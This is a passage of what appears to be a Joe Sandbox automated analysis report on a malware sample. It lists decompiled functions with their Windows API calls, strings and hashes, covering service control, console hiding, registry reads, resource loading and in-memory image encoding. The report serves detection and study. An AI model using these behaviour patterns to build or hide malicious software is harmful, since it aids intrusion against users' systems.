Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9

Function 0248C117 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32 ref: 0248C120
GetConsoleWindow.KERNEL32 ref: 0248C126
ShowWindow.USER32(00000000,00000000), ref: 0248C139
SetConsoleOutputCP.KERNEL32(000004E4), ref: 0248C15E

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Console$Window$AllocOutputShow
String ID:
API String ID: 4067487056-0
Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
Instruction ID: 562209f6b1a22e02e855fb3b3a45fc50f85c16939998b69d2173fcfff5ae8aa2
Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
Instruction Fuzzy Hash: 240184B1A80304BBCA10FBF29C4AF9E77AD9B24706F500427B205EB191EAA8D5044E29

Function 02489E87 Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020), ref: 02489E96
OpenServiceW.ADVAPI32(00000000,00000000,00000020), ref: 02489EAA
CloseServiceHandle.ADVAPI32(00000000), ref: 02489EB7
ControlService.ADVAPI32(00000000,00000001,?), ref: 02489EC6

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
Instruction ID: 1d792f5538efef0b8a93aa7028a22ced009e301ae43ec0385452b25d71f53c31
Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
Instruction Fuzzy Hash: 2BF096365003187BD711BB65AC89EBF3FACDB45AA1B040036F905922D2DB64CD46C9B4

Function 02489FEE Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 02489FFD
OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 0248A011
CloseServiceHandle.ADVAPI32(00000000), ref: 0248A01E
ControlService.ADVAPI32(00000000,00000003,?), ref: 0248A02D

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
Instruction ID: 70802dc62b486d2de9d18ef68eadd7148dec5aee248bb91b42e82edea8a9bb17
Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
Instruction Fuzzy Hash: 7EF09C715003147BD7117F65EC45EBF3BACDB456A1F000036FA0596191DB64CD45C9B5

Function 02489F89 Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040), ref: 02489F98
OpenServiceW.ADVAPI32(00000000,00000000,00000040), ref: 02489FAC
CloseServiceHandle.ADVAPI32(00000000), ref: 02489FB9
ControlService.ADVAPI32(00000000,00000002,?), ref: 02489FC8

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
Instruction ID: ec76d19eeab6004307d937fbd0de7d2624df28b7b2decbdcc6c084ac8305a568
Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
Instruction Fuzzy Hash: 04F096725043187BD711BB65AC89EBF3BACDB45AA1B004036FB06A2291DB64CD46C9B4

Function 02489E2B Relevance: 6.0, APIs: 4, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,02489A81,00000000,00000000), ref: 02489E34
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,02489A81,00000000,00000000), ref: 02489E49
CloseServiceHandle.ADVAPI32(00000000,?,?,02489A81,00000000,00000000), ref: 02489E56
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,02489A81,00000000,00000000), ref: 02489E61

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseHandleManagerStart
String ID:
API String ID: 2553746010-0
Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
Instruction ID: 0722f0fa7da1a15abc8fe143795309695a735bf92ecc11c3724535cda9a3e0ef
Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
Instruction Fuzzy Hash: F7F08972555318BFD211AB31AC88EBF2AACDF85AA2B00043AF50192291CB64CD46D975

Function 02474D18 Relevance: 6.0, APIs: 4, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,02474AA6,00000001,?,?,00000000,00475B70,02471A5A), ref: 02474D54
SetEvent.KERNEL32(?,?,?,00000000,00475B70,02471A5A), ref: 02474D60
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,02471A5A), ref: 02474D6B
CloseHandle.KERNEL32(?,?,?,00000000,00475B70,02471A5A), ref: 02474D74

Part of subcall function 0248A8ED: GetLocalTime.KERNEL32(00000000), ref: 0248A907

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID:
API String ID: 2993684571-0
Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
Instruction ID: 10602ae69d7a8cea8e0d8460bd27dae33892c671a6df22f4f10b1a3da8c20372
Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
Instruction Fuzzy Hash: A4F0E0754047107FDB1237759D0E6BB7FA9EB05311F0009AFFC92826B1D6708494CB66

Function 0248C0D6 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5), ref: 0248C0E0
GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 0248C0ED
SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0248C0FA
SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0248C10D

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID:
API String ID: 3024135584-0
Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
Instruction ID: fdb77da0f3014ab373c5437326bbe9c26b149d28a439f3784f5934bf562c3987
Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
Instruction Fuzzy Hash: 01E04F62104748ABD71427F5BC8DCAB3B6CE784A13B101536F61290393EA7488448A75

Function 0248A8A6 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(0046BC64,0000000A,00000000), ref: 0248A8B7
LoadResource.KERNEL32(00000000,?,?,0247E3EA,00000000), ref: 0248A8CB
LockResource.KERNEL32(00000000,?,?,0247E3EA,00000000), ref: 0248A8D2
SizeofResource.KERNEL32(00000000,?,?,0247E3EA,00000000), ref: 0248A8E1

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction ID: dcffd7d6666a5ece198ead427d2817d92845cbc95123ab1be4cca0e915e54c00
Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
Instruction Fuzzy Hash: 89E01A3A600710ABCB211BA5BC8CD477E39E786B633100036F90582331DA358850DA68

Function 024AA4B2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 024AA61E

Strings

-, xrefs: 024AA54E
+, xrefs: 024AA55B

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
Instruction ID: b01b9a8517c3ee01388333e7ca7fae45bc3f334f79abad9c844c72505e7b108d
Opcode Fuzzy Hash: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
Instruction Fuzzy Hash: ED91E670D042699FDF20CF69C4706EEBBB1AF65224F18825BE8A1A7390D330D546CF55

Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00441F6D

Strings

pow, xrefs: 00441F45, 00441F62

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E

Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00414BC0
GetTickCount.KERNEL32 ref: 00414C3C

Strings

>G, xrefs: 00414BEF

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: >G
API String ID: 180926312-1296849874
Opcode ID: 0e09c5692f23ecf23189663d56d6e041d01bf123b98fdf4351e249ee46c63089
Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
Opcode Fuzzy Hash: 0e09c5692f23ecf23189663d56d6e041d01bf123b98fdf4351e249ee46c63089
Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A

Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59

Strings

fD, xrefs: 0044DB4B
, xrefs: 0044DB9E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Info
String ID: $fD
API String ID: 1807457897-3092946448
Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65

Function 024A7CE7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 024A7D1A
__IsNonwritableInCurrentImage.LIBCMT ref: 024A7DD3

Strings

csm, xrefs: 024A7DBD

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
Instruction ID: 6a92d453386155ed95f28e902a3d922fdde95b9dd008e6576feabc19e334869a
Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
Instruction Fuzzy Hash: EB41C230A002099BCF20DF69C8A0AAFBBB6BF54328F14816AD8155B3D1D731DA41CF90

Function 024A3953 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON

Download Yara Rule

Strings

XG, xrefs: 024A39CF
LG, xrefs: 024A39AE

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: LG$XG
API String ID: 0-1482930923
Opcode ID: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
Instruction ID: 64c4ef6be3a1a9098f4e9dd61c3067f0a725cdd64a768e4593878ed1cc7f237d
Opcode Fuzzy Hash: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
Instruction Fuzzy Hash: F131D571E00704DADB20DFA9985179A7BA5AF51324F1081ABEC16EB2D0E7B096418B98

Function 00417BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08

Part of subcall function 004177A2: 70522440.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6

SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55

Part of subcall function 00417815: 7053EFB0.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827

Part of subcall function 004177C5: 70545080.GDIPLUS(?,00417CCC), ref: 004177CE

Strings

image/jpeg, xrefs: 00417C1F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateStream$70522440705370545080
String ID: image/jpeg
API String ID: 1687689087-3785015651
Opcode ID: 3fb60d21ba38309351867d9d2b81d22203ea45f6a3d032d3c2105c00861f54fd
Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
Opcode Fuzzy Hash: 3fb60d21ba38309351867d9d2b81d22203ea45f6a3d032d3c2105c00861f54fd
Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6

Function 02487E43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 02487E6F
SHCreateMemStream.SHLWAPI(00000000), ref: 02487EBC

Strings

image/jpeg, xrefs: 02487E86

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateStream
String ID: image/jpeg
API String ID: 1369699375-3785015651
Opcode ID: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
Instruction ID: 66a436162573113baa2f7693d8ff4f551193a451c690f22b547af50416fe9633
Opcode Fuzzy Hash: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
Instruction Fuzzy Hash: 30314B75514200AFC311EF65CC54DAFBBEAFF8A700F00491EF94597210DB759A088BA2

Function 02473C77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02473C91

Part of subcall function 0248AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02473CA7), ref: 0248ADC6

Part of subcall function 0248791D: CloseHandle.KERNEL32(02473D20,?,?,02473D20,00465324), ref: 02487933
Part of subcall function 0248791D: CloseHandle.KERNEL32($SF,?,?,02473D20,00465324), ref: 0248793C

Part of subcall function 0248B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02473D5A,00465324), ref: 0248B89A

Sleep.KERNEL32(000000FA,00465324), ref: 02473D63

Strings

8>G, xrefs: 02473CC2

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: 8>G
API String ID: 368326130-2084872820
Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
Instruction ID: 42f0306e5bd76b2884d3b7287c2d64bf65001151be6e53874dac871ebc7375e0
Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
Instruction Fuzzy Hash: B9315231A102545BCF19FBB6DC55AEE7777AF80700F0000AFE926A7194EFA05A4ACE91

Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9

Strings

OCP, xrefs: 00450932
ACP, xrefs: 004508FC

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358

Function 024C0B45 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024C0DA0,?,00000050,?,?,?,?,?), ref: 024C0C20

Strings

ACP, xrefs: 024C0B63
OCP, xrefs: 024C0B99

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction ID: 97d8456bdc0768b6f7d28caebf712e00482ff586a25c37f7c03c5ee0a0ffab5d
Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
Instruction Fuzzy Hash: A121D67AA00104E6E7B4CE9DC900BA773AAEF44B69F76942EE909D7301F732D941C360

Function 0247B0BF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 024A3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 024A378B
Part of subcall function 024A3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 024A37C8

Part of subcall function 024A3B0C: __onexit.LIBCMT ref: 024A3B12

__Init_thread_footer.LIBCMT ref: 0247B10E

Part of subcall function 024A3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 024A3740
Part of subcall function 024A3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 024A3773

Strings

,]G, xrefs: 0247B0E7
0]G, xrefs: 0247B0D7

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
String ID: ,]G$0]G
API String ID: 2974294136-589576501
Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
Instruction ID: 16c45ab5e3b06f94fa23f0625535bc5f7fa1a01bb24c8699c05abca2fbc7ce25
Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
Instruction Fuzzy Hash: C0219131A005089BCB15FBB5D890EEE773BEF50314F50406FD92667291EF646E8ACE94

Function 0247B951 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 0248277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0248279E
Part of subcall function 0248277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 024827BB
Part of subcall function 0248277A: RegCloseKey.ADVAPI32(?), ref: 024827C6

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0247B9D3
PathFileExistsA.SHLWAPI(?), ref: 0247B9E0

Strings

TUF, xrefs: 0247B992

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: TUF
API String ID: 1133728706-3431404234
Opcode ID: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
Instruction ID: 1dd5bf9df2bfd7c54535ea8b1ab919d82c97268d559583c5111480b51698d73a
Opcode Fuzzy Hash: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
Instruction Fuzzy Hash: BD21D670A402056ACB05F7B2CC56DEE7726EF11704F40006F9D2267280FEA19A4ACEA2

Function 00417CD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4

Part of subcall function 004177A2: 70522440.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6

SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19

Part of subcall function 00417815: 7053EFB0.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827

Part of subcall function 004177C5: 70545080.GDIPLUS(?,00417CCC), ref: 004177CE

Strings

image/png, xrefs: 00417D0B

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateStream$70522440705370545080
String ID: image/png
API String ID: 1687689087-2966254431
Opcode ID: 41166400191f2a2e313fc56bb4e5546c11dba027674448f6a616de4461b8b382
Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
Opcode Fuzzy Hash: 41166400191f2a2e313fc56bb4e5546c11dba027674448f6a616de4461b8b382
Instruction Fuzzy Hash: AA21A135204211AFC300AF61CC88CAFBBBDEFCA714F10052EF90693151DB399945CBA6

Function 02487F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 02487F5B
SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 02487F80

Strings

image/png, xrefs: 02487F72

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CreateStream
String ID: image/png
API String ID: 1369699375-2966254431
Opcode ID: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
Instruction ID: 9fa7ec265892382a70307e6cfc624e873550946185123d5638abc00112a3ac3e
Opcode Fuzzy Hash: 25f78a6c939044b88dc5ef2f4c2223da77e15e8f6bc9fc575da7c5d280fbe838
Instruction Fuzzy Hash: CF218135200211AFC701EF65CC94CAFBBAEEF8A750F10051EFA5693121DB759A45DBA2

Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

